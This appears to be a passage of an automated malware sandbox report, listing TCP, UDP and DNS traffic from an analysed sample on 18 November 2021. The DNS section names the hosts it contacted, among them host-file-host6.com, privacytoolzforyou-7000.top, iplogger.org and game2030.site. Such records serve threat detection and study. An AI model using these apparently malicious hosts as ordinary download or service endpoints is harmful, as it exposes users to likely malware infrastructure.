                                                                                                                                                                                                  Nov 18, 2021 10:30:10.609358072 CET4976280192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.609364033 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.609386921 CET4976280192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.609406948 CET4976280192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.674648046 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.674690008 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.674716949 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.674741983 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.674743891 CET4976280192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.674766064 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.674777031 CET4976280192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.674791098 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.674817085 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.674843073 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.674864054 CET4976280192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.674873114 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.674896955 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.674904108 CET4976280192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.674922943 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.674930096 CET4976280192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.674946070 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.674971104 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.674987078 CET4976280192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.674994946 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.675019026 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.675040007 CET4976280192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.675040960 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.675065041 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.675081015 CET4976280192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.675088882 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.675112963 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.675136089 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.675139904 CET4976280192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.675182104 CET4976280192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.740911007 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.740945101 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.740972042 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.740994930 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741019964 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741025925 CET4976280192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741045952 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741070986 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741080046 CET4976280192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741096020 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741115093 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741132975 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741152048 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741161108 CET4976280192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741178989 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741205931 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741230011 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741257906 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741281033 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741306067 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741328001 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741339922 CET4976280192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741353035 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741379023 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741379976 CET4976280192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741403103 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741425991 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741427898 CET4976280192.168.2.7188.225.85.124
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741450071 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741472006 CET8049762188.225.85.124192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.741489887 CET4976280192.168.2.7188.225.85.124

                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.468482971 CET5871753192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.488686085 CET53587178.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.741447926 CET5976253192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.759700060 CET53597628.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.351627111 CET5432953192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.371493101 CET53543298.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:12.781605959 CET5805253192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:12.801589966 CET53580528.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:13.013391018 CET5400853192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:13.033443928 CET53540088.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:15.799488068 CET5945153192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:15.817898989 CET53594518.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:16.003914118 CET5291453192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:16.023533106 CET53529148.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:16.186709881 CET6456953192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:16.206319094 CET53645698.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:16.393234015 CET5281653192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:16.412431002 CET53528168.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:16.577472925 CET5078153192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:16.597249031 CET53507818.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:20.826231956 CET5491153192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:20.846060991 CET53549118.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:21.015887022 CET4995853192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:21.035716057 CET53499588.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:21.231005907 CET5086053192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:21.250483990 CET53508608.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:21.489384890 CET5045253192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:21.511094093 CET53504528.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:23.489267111 CET5973053192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:23.510062933 CET53597308.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:23.698165894 CET5931053192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:23.717825890 CET53593108.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:23.903894901 CET5191953192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:23.923667908 CET53519198.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:24.685193062 CET6429653192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:25.036092043 CET53642968.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:25.248127937 CET5668053192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:25.268027067 CET53566808.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:25.503374100 CET5882053192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:25.880645037 CET53588208.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:29.466130018 CET4924753192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:29.486722946 CET53492478.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:29.680056095 CET5228653192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:29.700525999 CET53522868.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:29.874906063 CET5606453192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:29.895117044 CET53560648.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:30.086523056 CET6374453192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:30.106487989 CET53637448.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:30.356156111 CET6145753192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:30.721813917 CET53614578.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:31.286823988 CET5836753192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:31.307321072 CET53583678.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:31.526957989 CET6059953192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:31.547688961 CET53605998.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:31.798346996 CET5957153192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:31.819758892 CET53595718.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:32.065603018 CET5268953192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:32.084981918 CET53526898.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:32.250958920 CET5029053192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:32.272644997 CET53502908.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:32.523453951 CET6042753192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:32.545258045 CET53604278.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:36.793920040 CET5958253192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:36.813528061 CET53595828.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:38.116136074 CET6094953192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:38.136236906 CET53609498.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:38.330163956 CET5854253192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:38.348126888 CET53585428.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:38.657315016 CET5917953192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:38.677207947 CET53591798.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:38.879878044 CET6092753192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:38.899976015 CET53609278.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:39.173834085 CET5785453192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:39.193674088 CET53578548.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:39.405555010 CET6202653192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:39.425133944 CET53620268.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:39.607285023 CET5945353192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:39.624965906 CET53594538.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:39.884414911 CET6246853192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:39.904433012 CET53624688.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:40.142179966 CET5256353192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:40.159704924 CET53525638.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:40.425576925 CET5472153192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:40.445641041 CET53547218.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:40.637670994 CET6282653192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:40.657869101 CET53628268.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:40.834892035 CET6204653192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:40.853019953 CET53620468.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:41.041389942 CET5122353192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:41.061248064 CET53512238.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:30:41.371155024 CET6390853192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:30:41.390899897 CET53639088.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:31:27.285083055 CET5717953192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:31:27.306971073 CET53571798.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:31:27.579091072 CET5612453192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:31:27.597131014 CET53561248.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:31:31.040317059 CET6228753192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:31:31.108372927 CET53622878.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:31:33.117786884 CET5464453192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:31:33.135303020 CET53546448.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:31:36.085480928 CET5915953192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:31:36.105379105 CET53591598.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:31:36.406079054 CET5792453192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:31:36.764942884 CET53579248.8.8.8192.168.2.7
                                                                                                                                                                                                  Nov 18, 2021 10:31:38.817482948 CET5171253192.168.2.78.8.8.8
                                                                                                                                                                                                  Nov 18, 2021 10:31:39.177006006 CET53517128.8.8.8192.168.2.7

                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.468482971 CET192.168.2.78.8.8.80xed65Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.741447926 CET192.168.2.78.8.8.80x56e0Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.351627111 CET192.168.2.78.8.8.80xff14Standard query (0)privacytoolzforyou-7000.topA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:12.781605959 CET192.168.2.78.8.8.80xb7e4Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:13.013391018 CET192.168.2.78.8.8.80x8e70Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:15.799488068 CET192.168.2.78.8.8.80x73c9Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:16.003914118 CET192.168.2.78.8.8.80x4d48Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:16.186709881 CET192.168.2.78.8.8.80x8d2Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:16.393234015 CET192.168.2.78.8.8.80x7b6cStandard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:16.577472925 CET192.168.2.78.8.8.80x5e50Standard query (0)host-file-host0.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:20.826231956 CET192.168.2.78.8.8.80xdc42Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:21.015887022 CET192.168.2.78.8.8.80xe5d6Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:21.231005907 CET192.168.2.78.8.8.80xe4d8Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:21.489384890 CET192.168.2.78.8.8.80x1d78Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:23.489267111 CET192.168.2.78.8.8.80xdc19Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:23.698165894 CET192.168.2.78.8.8.80x6ce1Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:23.903894901 CET192.168.2.78.8.8.80x2e56Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:24.685193062 CET192.168.2.78.8.8.80x4cb5Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:25.248127937 CET192.168.2.78.8.8.80xe5bStandard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:25.503374100 CET192.168.2.78.8.8.80xf093Standard query (0)host-file-host0.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:29.466130018 CET192.168.2.78.8.8.80xbe17Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:29.680056095 CET192.168.2.78.8.8.80xd05eStandard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:29.874906063 CET192.168.2.78.8.8.80x3bafStandard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:30.086523056 CET192.168.2.78.8.8.80xba91Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:30.356156111 CET192.168.2.78.8.8.80xac85Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:31.286823988 CET192.168.2.78.8.8.80xb638Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:31.526957989 CET192.168.2.78.8.8.80x2317Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:31.798346996 CET192.168.2.78.8.8.80x2ef4Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:32.065603018 CET192.168.2.78.8.8.80xd565Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:32.250958920 CET192.168.2.78.8.8.80xaa6cStandard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:32.523453951 CET192.168.2.78.8.8.80x86feStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:36.793920040 CET192.168.2.78.8.8.80xb4d0Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:38.116136074 CET192.168.2.78.8.8.80xf8fdStandard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:38.330163956 CET192.168.2.78.8.8.80x78c5Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:38.657315016 CET192.168.2.78.8.8.80xb2e5Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:38.879878044 CET192.168.2.78.8.8.80xac18Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:39.173834085 CET192.168.2.78.8.8.80x241bStandard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:39.405555010 CET192.168.2.78.8.8.80x3e50Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:39.607285023 CET192.168.2.78.8.8.80x6357Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:39.884414911 CET192.168.2.78.8.8.80x2619Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:40.142179966 CET192.168.2.78.8.8.80xc42dStandard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:40.425576925 CET192.168.2.78.8.8.80x747eStandard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:40.637670994 CET192.168.2.78.8.8.80x8300Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:40.834892035 CET192.168.2.78.8.8.80x7679Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:41.041389942 CET192.168.2.78.8.8.80x50a1Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:41.371155024 CET192.168.2.78.8.8.80x1320Standard query (0)host-file-host6.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:27.285083055 CET192.168.2.78.8.8.80x1b9Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:27.579091072 CET192.168.2.78.8.8.80xf919Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:31.040317059 CET192.168.2.78.8.8.80xc34dStandard query (0)modenm.siteA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:33.117786884 CET192.168.2.78.8.8.80x46d5Standard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:36.085480928 CET192.168.2.78.8.8.80x787Standard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:36.406079054 CET192.168.2.78.8.8.80x5893Standard query (0)game2030.siteA (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:31:38.817482948 CET192.168.2.78.8.8.80x68f8Standard query (0)game2030.siteA (IP address)IN (0x0001)

                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.488686085 CET8.8.8.8192.168.2.70xed65No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:08.759700060 CET8.8.8.8192.168.2.70x56e0No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.371493101 CET8.8.8.8192.168.2.70xff14No error (0)privacytoolzforyou-7000.top188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:12.801589966 CET8.8.8.8192.168.2.70xb7e4No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:13.033443928 CET8.8.8.8192.168.2.70x8e70No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:15.817898989 CET8.8.8.8192.168.2.70x73c9No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:16.023533106 CET8.8.8.8192.168.2.70x4d48No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:16.206319094 CET8.8.8.8192.168.2.70x8d2No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:16.412431002 CET8.8.8.8192.168.2.70x7b6cNo error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:16.597249031 CET8.8.8.8192.168.2.70x5e50No error (0)host-file-host0.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:20.846060991 CET8.8.8.8192.168.2.70xdc42No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:21.035716057 CET8.8.8.8192.168.2.70xe5d6No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:21.250483990 CET8.8.8.8192.168.2.70xe4d8No error (0)host-file-host6.com188.225.85.124A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:21.511094093 CET8.8.8.8192.168.2.70x1d78No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:21.511094093 CET8.8.8.8192.168.2.70x1d78No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                                                                                                                                                                                  Nov 18, 2021 10:30:21.511094093 CET8.8.8.8192.168.2.70x1d78No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
